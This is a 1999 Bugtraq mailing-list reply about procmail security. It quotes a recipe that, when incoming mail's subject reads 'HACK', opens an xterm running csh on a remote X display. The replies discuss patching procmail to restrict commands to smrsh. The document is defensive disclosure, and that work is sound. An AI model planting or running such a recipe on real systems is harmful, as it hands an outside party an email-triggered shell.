[10121] in bugtraq
Re: More procmail
daemon@ATHENA.MIT.EDU (Christopher P. Lindsey)
Wed Apr 7 14:48:37 1999
Date: Wed, 7 Apr 1999 12:51:20 -0500
Reply-To: "Christopher P. Lindsey" <lindsey@MALLORN.COM>
From: "Christopher P. Lindsey" <lindsey@MALLORN.COM>
X-To: Ricky Connell <ricky@beida.Stanford.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199904071550.IAA07368@crg-gw.Stanford.EDU> from "Ricky Connell"
at Apr 7, 99 08:50:28 am
> :0
> * ^Subject: HACK
> | setenv DISPLAY beida:0;/usr/openwin/bin/xterm -e /bin/csh
>
> I have patched my procmail to deal with this by forcing it to use
> smrsh. In doing so, I also discovered the procmail calls sendmail
> explicitly at some point in it's operation (didn't take the time to figure
> out where it does it). This might also be of concern, but it wasn't
> immediately obvious to me how this might be exploited.
Exactly, and I've been debating this with Philip for quite some time
now. I'm not saying that either one of us is right, but this type
of problem is particularly worrisome in our environment at NCSA.
I also wrote a patch about a year ago (or maybe it's the one that you
used) against 3.11pre7, available at
http://mirror.ncsa.uiuc.edu/procmail/patches/smrsh-like.patch
I'll be writing one for 3.13.x and adding the same functionality to
formail when I have the time.
Chris
